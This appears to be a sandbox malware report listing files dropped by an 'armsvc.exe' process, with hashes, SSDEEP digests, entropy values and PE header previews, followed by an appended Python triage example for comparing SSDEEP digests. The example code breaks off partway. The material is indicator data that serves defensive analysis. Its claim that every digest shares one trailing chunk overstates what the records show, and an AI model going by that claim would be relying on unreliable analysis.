SHA-512:7D7BCC03CA1A36BE9CE36FC03E9212C2D681FFFDCDD79030789077BABA834E7D588AE5881F6E39231AA39BBBF5CE2241450185A311632DBAF6FEBBBCBB980478
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1804800
Entropy (8bit):5.247481061981319
Encrypted:false
SSDEEP:24576:ZHQJLIRZvsnNR/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ZHQJLy4RLNiXicJFFRGNzj3
MD5:1F876C371DED28E130A378424B77D745
SHA1:DEAE8999775989D286554DDB40A5A2021FE2D8AD
SHA-256:2F76D7374A42E860F6A642BD51B984EB11AFC815353C00DD2805FBA187B755A8
SHA-512:EC1EC063BCE043AA37F1F7915D59215250DE63E6C057C116A94D68B0ACD9BDB187128743AFC5784504F1A59EBF8E7200CA3F872ADB1AE01BD135807CA91C324B
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5365760
Entropy (8bit):6.447938137266422
Encrypted:false
SSDEEP:49152:TUZujDjDjDjXmXgoz2PsapFQr97dRpqbeE8U2Izwot+bdro4O8b8ITDnlggyJ1kx:IWmXL6DE97dRpKuoQbgC7wRGpj3
MD5:04CCEF8AF012D0BBE58B0637DADE3682
SHA1:3297FF0F92049346F10062A8509E45744BEF9EAB
SHA-256:43710806CBE5CE01BB2D42D260DCF385D48A203FD38C8B7801314AE57AC600DE
SHA-512:2F3B6B8F2325EEDDCE19C5F6141DEE80A52808FF2F17F5F40E1B331C3B11DD3BB5912F83320667FD35DB266146378FAF4BA9525202F90B307384882D86FA9915
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3163136
Entropy (8bit):7.971279241050893
Encrypted:false
SSDEEP:98304:WrZ23AbsK6Ro022JjL2WEiVqJZd7wRGpj3:QJADmmxL2WEoCZhF9
MD5:F6E0896ED4DD35B6BC8B89758B886C72
SHA1:1963934D71A77B96EE0A494942C70D9226A4A30B
SHA-256:A1CEAA18C2DD17EE7BFF8185421F3B53176C2D0AC014553DE26EE1F5BF33CC05
SHA-512:AFB7A1DB6C08E4B78F2CA4AC1B7629DB8B63D238E86B7CF1D7EF72F0BF787365271E403BD6965BCBE6F3FF7E3B0A0A3F46013A4B3C2C995EFF5C4CC83D038A9B
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1213440
Entropy (8bit):7.194657091391323
Encrypted:false
SSDEEP:24576:afrYY42wd7hlOE9fpkEE64U/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:j/9xrSULNiXicJFFRGNzj3
MD5:DFC7546A653B834771FD19B0D832414F
SHA1:F7AD1C01DAEAEE6F0839B8F5C7678BACE6EF8B7E
SHA-256:FB001A2126D995C44B52794B2E7CBB56297022CB162124BDCFD97909CDBCD6DF
SHA-512:7705419FEB98613CA0663DA19A4C96269F9D7DBEF95A18C3AE5F662B31C4AA14C3CAD17A440E5400DE065D5956A667D3216EF2BCD75DB7C444514CE956438747
Malicious:true
Reputation:unknown
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1544192
                                                                                                                                                  Entropy (8bit):4.836102321508394
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:7zNKU/5T/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:7zNr/5TLNiXicJFFRGNzj3
                                                                                                                                                  MD5:A74E527E4DEC3BA66B39963F979E471E
                                                                                                                                                  SHA1:CE386DDDF7E2795A61C73438AA4282A18F7CE5A5
                                                                                                                                                  SHA-256:B9B8958619DC878DF6427D2CC8F6F245F0A622A14525DF3705CB28F8725D2C2F
                                                                                                                                                  SHA-512:734B8F7F065EF2DEF3FBF0B07218286529B3B0C406CD62A9CA1E58331DED51393B9A3432DE3962E5A92835C777E0A44579E9A48B15FEF3F741E8CAE5BEBC43A1
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):5855744
                                                                                                                                                  Entropy (8bit):6.572133770210121
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:98304:VALuzDKnxCp3JKCrPJzruaI6HMaJTtGb+7wRGpj3:2aGg3cuPIaI6HMaJTtGbyF9
                                                                                                                                                  MD5:7E460A630E95DA1229351CB29360B0CD
                                                                                                                                                  SHA1:ACFA94C9735CE496802F15DEBFBBAEC28DC1FF17
                                                                                                                                                  SHA-256:46B226F90083FA69FE5BD771AC7D2689E4C4E90671756C8C27F707A282BE2002
                                                                                                                                                  SHA-512:951F86877783D6DEFCEE522E7D1E909A26E915A199F71D64D7CB9D6F1057E03B58F131E31F09F1CF6264CB50825F2FEC805CED7159CEC2F33BBBAC19AE4FA447
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1468416
                                                                                                                                                  Entropy (8bit):4.890076282617634
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:vXr/SVAxWQ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:TNxdLNiXicJFFRGNzj3
                                                                                                                                                  MD5:2F598AC78D8B5787C96B95B60EC550F1
                                                                                                                                                  SHA1:EC0084C772CB662AA094B008E64A43156A311E0A
                                                                                                                                                  SHA-256:48BD23B16557CB75C304A12F2F8D322515BFC30E27B807575585271D77A7CA1B
                                                                                                                                                  SHA-512:44ED3379158C16F7A02D785EEBFA6A07636D99D21FE4525F17686786ABC224BB98A5897A94935CB82155B0041B2C184FD806E80A229039D293E9BD4854C4D79B
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):27533312
                                                                                                                                                  Entropy (8bit):6.248047435541867
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:196608:fhRrmpGpGdJM7Hbp8JfrCGvqTYuNDmoefAlprtPz25HqaI6HMaJTtGbQO2F9:fhRCpGpMJMrbp8JjpWdNlc5V9
                                                                                                                                                  MD5:7B07045010876FA80CD2987CF34C7E9D
                                                                                                                                                  SHA1:724D3F10A208999F7472B819B47EE08CD47BE409
                                                                                                                                                  SHA-256:7128C4D5B366FEA275742D7411E8740E0938948DD6723AD4075C2BECBA23640B
                                                                                                                                                  SHA-512:2BC81908CF17901D622604A5FE548FB17EC29EFF4D5D6BFC4AC78EEC3F6F7ACD8B6D3E8B33D35EFBD1012C826F3A908D155DAA73CCBD38A853F2B75E5E643B06
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2199552
                                                                                                                                                  Entropy (8bit):6.782230933232861
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:F83pZ3kd0CuEeN0LUmRXbYs65mKLNiXicJFFRGNzj3:1KuUMY15B7wRGpj3
                                                                                                                                                  MD5:4AE8ADF9E12D9FFF0F288FB1B5B90662
                                                                                                                                                  SHA1:89A952CC40C6B88AD81403A5D21B27F088DB6387
                                                                                                                                                  SHA-256:3E867D570A0FF01865239F3FF9D51BCBE9AB24554F7B43F24C7193830FFF697F
                                                                                                                                                  SHA-512:7A120F98585FAC7A05C78C4B39387E034A3601E2EC7FAAAB15F6F7775C6EC845B3149F308722742F6C05DC6AB7864588008DE994E04DE99DD32DDAD8EA2F7D69
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4971008
                                                                                                                                                  Entropy (8bit):6.668194663584365
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:mErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGO8ndOPcptz6+MM:4A4oGlcR+glpdOPKzgVZw7wRGpj3
                                                                                                                                                  MD5:7AC201DD547394BFDE9BA920599AC085
                                                                                                                                                  SHA1:5C94E6895B98D3B8E15AF11B996CB92BDB123DF4
                                                                                                                                                  SHA-256:D115CF87F59A1D228A99A7CF44A6C714F5C3A2952137B7118C3224F5616DAAB4
                                                                                                                                                  SHA-512:AF167B2E340A414BCCC0F46846D37C38252B656CFCAC4EE17F0097E6D8F53B924B1881E61B613E77FCBBA41838D6D8A140A4936A59FAD39C72F63367CCCED99C
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4897792
                                                                                                                                                  Entropy (8bit):6.827351215372555
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:68ErDqTGsitHloGgkiDrCvJVZfEcpwD0YLgVCM2hnwLNwiHaGI3Y/685ZYMaWgKe:Xv2gM+qwtLg7pPgw/DSZ9L7wRGpj3
                                                                                                                                                  MD5:7FE65DD2F6BABBA5873955EC61780924
                                                                                                                                                  SHA1:1E1FD2D765BEADD1CFC13E42204E30EEB719623C
                                                                                                                                                  SHA-256:F1279C3D036DA730F4641D46DAB517F0E0669AFC7E56858CC40DB379AF5A41E1
                                                                                                                                                  SHA-512:61C46FE4A99A4E44F6E5BE49F23E0D0345E1C3477BCFACAE06AC7EDFD553B8B45ADEA575DE870B8A3C830EEF3A0F3BBD8B2668A9D095F88E924B9D31F4E848AF
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4897792
                                                                                                                                                  Entropy (8bit):6.827351180530735
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:p8ErDqTGsitHloGgkiDrCvJVZfEcpwD0YLgVCM2hnwLNwiHaGI3Y/685ZYMaWgKe:ev2gM+qwtLg7pPgw/DSZ9L7wRGpj3
                                                                                                                                                  MD5:9A0D9414E1332F5FEB32FC0B12168B42
                                                                                                                                                  SHA1:0020FC195E1BA77C8244FCE84747BAC637D6F856
                                                                                                                                                  SHA-256:E626D01758BAFC4EDD169399A2152FC1AACE6D6186A22D7CDB0486B0C772A211
                                                                                                                                                  SHA-512:D90A254A1C58A73F96E7AAAF08CACDFECE3376C6E532F40C2BDF3CB99E89DB36099C6D856621CA13BF896E1EB79573652376DBC17C1457FFAD1E105D189AC6B3
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2156544
                                                                                                                                                  Entropy (8bit):6.947515475098851
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:LtjqL8fHv8aUbp8D/8+xQWAV/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:xjKKv81FI/85rLNiXicJFFRGNzj3
                                                                                                                                                  MD5:3EDA60883FBF69D95EACD7A0CEA03B6A
                                                                                                                                                  SHA1:A7A045B8234C0CEF8D92147CF2C783352C03C2F6
                                                                                                                                                  SHA-256:9CEB04A1E95728B6274085FF2E7F3DDF99A0A3B461600D01F5C7E37BDB95EEA7
                                                                                                                                                  SHA-512:8EA8059E587259A6014EB4D2B88BC595DF9DF3676CA0AFBE68F5B04D0743988D1C19BA31328D373251F757C47BC531EFB546E5DB62BCA00F235FC1D3E0F6B6C7
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2370560
                                                                                                                                                  Entropy (8bit):7.027357521577748
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:FAMsOu3JfCIGcZuTodRFYKBrFxbWplLNiXicJFFRGNzj3:FAMa3PZuTSe7wRGpj3
                                                                                                                                                  MD5:68179C7A7DE0B1ED4B910C5C60143191
                                                                                                                                                  SHA1:ADD0D8C57FB2D0EFD2A5B74607D2E25CE0FEB01A
                                                                                                                                                  SHA-256:86A448595195FA3F0B9EC2A0FDB32C14080DE5967F7A787EE6E1693521B0919E
                                                                                                                                                  SHA-512:F44A504C55AE6A4DFC900967C30FCD8D86A209C0FA0A39A1A256F3DDCE6AAE40912F322EB7A12065FF59D4043AD954E311B31770FCC7913447C77ECA744EC3A0
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%......|$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1984512
                                                                                                                                                  Entropy (8bit):7.098289029587309
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:OSK7Fhsly2EPfOfEQLNiXicJFFRGNzj3:DU2cBQ7wRGpj3
                                                                                                                                                  MD5:FD78FBB2F561639B1ED86E5A8E587A52
                                                                                                                                                  SHA1:F85940EC9506C8743C5459261C087A909F6DC1F2
                                                                                                                                                  SHA-256:03F76724A56A6292DF43A0C38B7056D85B0C71B5E59C72943FB730FFFF6CB2EF
                                                                                                                                                  SHA-512:A4650939DC67804A859DE4F801EBB96D9BBE428682E86379D6CCC3341A878AF08755BB32EC91C21648A1D9F9F58CF9D9D8A851559F87ACA2FE0F3ABDC4F983BB
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."............................@....................................Q<.... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1779712
                                                                                                                                                  Entropy (8bit):7.151364902018391
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:Uv7e0j11mD+/wDfb+LNiXicJFFRGNzj3:ODx1mz+7wRGpj3
                                                                                                                                                  MD5:F920B8DA31BA119EDD7CD8AFA3B9186B
                                                                                                                                                  SHA1:E41C284D29EF321036D5234D467FAD1A0899EF4B
                                                                                                                                                  SHA-256:10E5C1DF77F6F619A096F1D72107F4FC653CF4DEB5736088DBE707A7EDA41587
                                                                                                                                                  SHA-512:AC43DF90FE4045EB318F87EA1DE7AC0DD1577022B40D04A33629CC24F338FB0DA288709E7DF1D150135140DCF8D35CFAB70C6C5C9EEF94E99AEF79DBB187C0F3
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."..........B.................@.......................................... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1533952
                                                                                                                                                  Entropy (8bit):4.933091317008658
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:sKhSK/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:sQLNiXicJFFRGNzj3
                                                                                                                                                  MD5:46A88030650B69A1D77D639BE797C089
                                                                                                                                                  SHA1:AC9E2A29735AD0976BF924E802E8DC9C85564546
                                                                                                                                                  SHA-256:23C6EF2B3257F139C5D54C116224CC19712A2514B770D1E8C2F8BB417FD6ED75
                                                                                                                                                  SHA-512:C86640AAD2809ADF7121E67E7E8B2285C2CB1E94878A19BF25984EEE02E09E7D8FB1C21025FA9B927A323BED5E08C08BE6F5A2937EFCDE56160C99971A86AD9E
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................."........... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...`... ......................@...................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1286656
                                                                                                                                                  Entropy (8bit):7.213926379706895
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:EsFfc1VyFnTUQn652bO4Hl/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:EsFcInTrJ7LNiXicJFFRGNzj3
                                                                                                                                                  MD5:5ECF9FFAC9C1BEF34D4D30E58F65417B
                                                                                                                                                  SHA1:C6446F12C1BFF4DBC7E9C94219E9CB6B62D202CF
                                                                                                                                                  SHA-256:AA0F63BF4D1E019952B058F7EA4995413B882C6B4559352A66FD121DA9248352
                                                                                                                                                  SHA-512:BAC8FC6394A1CC1168FDE52011A9470AAA646B6D421CF7FFE20923759776BC3525A9C5A6D8A7FDA584EDB80597FCDD77E0C1D29CC22BCB8BB9B16E8CA46B00F1
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@......................................... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1246208
                                                                                                                                                  Entropy (8bit):7.48557704963998
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:nt9j6p4xQbiKI69wpemIwpel9u/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:nt9+aQbtl2peapel8LNiXicJFFRGNzj3
                                                                                                                                                  MD5:550EA7B872B92DB4344DE6F7F5BD465D
                                                                                                                                                  SHA1:4856B577FA322AE14D4C42CEC92A87EC16BAD0A2
                                                                                                                                                  SHA-256:B071F12A9EB3502AA1B5CBC11235B9A725CAAA62852D270507F8633120A6E91C
                                                                                                                                                  SHA-512:1DDCEE4097858BAABF0EA8325077EEA358E0D807158CED92A9660545A7EED89C93FD55DF22171FB928A453649A4A5DDDBC12F60EF586A185CED7263A31B394F7
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@.....................................m.... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1512448
                                                                                                                                                  Entropy (8bit):4.89787576946359
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:tQVTZu0Jd/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:GVTZusLNiXicJFFRGNzj3
                                                                                                                                                  MD5:DB9DAC65C2D1052E2BAC162684DBD6A4
                                                                                                                                                  SHA1:7E502F6157C6172FB5CB82E646FD14030CF57C5F
                                                                                                                                                  SHA-256:218FA228238EF44002F8F720B3372C91687798870390A04C13FAF83C9DBC75E4
                                                                                                                                                  SHA-512:B9D1345E5BED23B2B90AC71A3CB0D801427DE1DD6AE0D1D3919A47CE0928A7B243B4C9062755C39328B3181DBE95E3916B47D8E82D8446240D4B6DBC4784C4DF
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................`".....G].... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...`...........t..............@...........................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1344000
                                                                                                                                                  Entropy (8bit):6.7983879700794505
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:8C1vpgXcZ/zr/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:8C1vpIc9rLNiXicJFFRGNzj3
                                                                                                                                                  MD5:3563E4DA1C2DBACF554C51949192F618
                                                                                                                                                  SHA1:2DF42269B4608FC3F8206210A25880685C580254
                                                                                                                                                  SHA-256:B5B7D6E5D70970F688F97B2BAA3E9FB0EC6C77F90BAE5A6BBB7AF700597DDC7F
                                                                                                                                                  SHA-512:35C5D10A8072BBF8CD1A2D618304BF7DCB135EE3A7CA6175DBF6D036C9FCFB72BC36BF3A4864FA8A6FCB40F4EB987A2D3F78D004C77502325EE77A9A64E9E909
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@....................................7..... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1355776
                                                                                                                                                  Entropy (8bit):4.651130323907116
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:FSv/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:QLNiXicJFFRGNzj3
                                                                                                                                                  MD5:D27B2B2743008EEDADEBCF92D9216436
                                                                                                                                                  SHA1:87A807BC6620F53E118C5760F5F8EC9B36B116DC
                                                                                                                                                  SHA-256:ACE36A6490565BC50020EF1C611D92DEC38D13D21DEE5C1C87EB60A527C990F0
                                                                                                                                                  SHA-512:C50E5ECCEBCB635EF9BB34B66B739F58285DF6D7579B54FD5D8C968386456A30AF79F6DF85E1D1C8678B1CA7B4E824CC1208D8DD8C921E03FB93D1AB4FE689CE
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@.......................................... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...`...p......................@...................................................................................................................................................................................................................................................................
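A triage check for the records in this section, added here as an example and not part of the Joe Sandbox report. Every dropped file listed above carries an SSDEEP digest whose chunk ends in the same characters (LNiXicJFFRGNzj3 for the 49152-block digests, and the same string at the end of the double-block chunk of the 24576-block digests). SSDEEP (context-triggered piecewise hashing) emits its chunk characters in file-offset order and stores two chunks per digest, one at the digest's own block size and one at twice that, so digests are comparable only when their block sizes are equal or differ by a factor of two. The code below copies the SSDEEP and MD5 values from the records, aligns the digests on a common block size, extracts the shared trailing chunk, and reimplements the 8-bit Shannon entropy shown in the "Entropy (8bit)" field. A shared tail means the end of each file hashed identically; whether that tail is an appended payload has to be confirmed by diffing the files, which this example does not do. The ssdeep edit-distance score itself is not reproduced here (assumption: the standard block-size alignment rule is enough for this check).

```python
"""Align SSDEEP digests from the dropped-file records and find the chunk tail they share.

The digests and MD5 keys below are copied from the report records; the alignment
rule (equal block size, or one digest at exactly twice the other's block size) is
standard ssdeep behaviour. Example code, not part of the sandbox report.
"""
import math
from collections import Counter
from os.path import commonprefix

# MD5 -> SSDEEP, copied from the dropped-file records in this section.
DROPPED_SSDEEP = {
    "68179C7A7DE0B1ED4B910C5C60143191": "49152:FAMsOu3JfCIGcZuTodRFYKBrFxbWplLNiXicJFFRGNzj3:FAMa3PZuTSe7wRGpj3",
    "FD78FBB2F561639B1ED86E5A8E587A52": "49152:OSK7Fhsly2EPfOfEQLNiXicJFFRGNzj3:DU2cBQ7wRGpj3",
    "F920B8DA31BA119EDD7CD8AFA3B9186B": "49152:Uv7e0j11mD+/wDfb+LNiXicJFFRGNzj3:ODx1mz+7wRGpj3",
    "46A88030650B69A1D77D639BE797C089": "24576:sKhSK/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:sQLNiXicJFFRGNzj3",
    "5ECF9FFAC9C1BEF34D4D30E58F65417B": "24576:EsFfc1VyFnTUQn652bO4Hl/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:EsFcInTrJ7LNiXicJFFRGNzj3",
    "550EA7B872B92DB4344DE6F7F5BD465D": "24576:nt9j6p4xQbiKI69wpemIwpel9u/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:nt9+aQbtl2peapel8LNiXicJFFRGNzj3",
    "DB9DAC65C2D1052E2BAC162684DBD6A4": "24576:tQVTZu0Jd/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:GVTZusLNiXicJFFRGNzj3",
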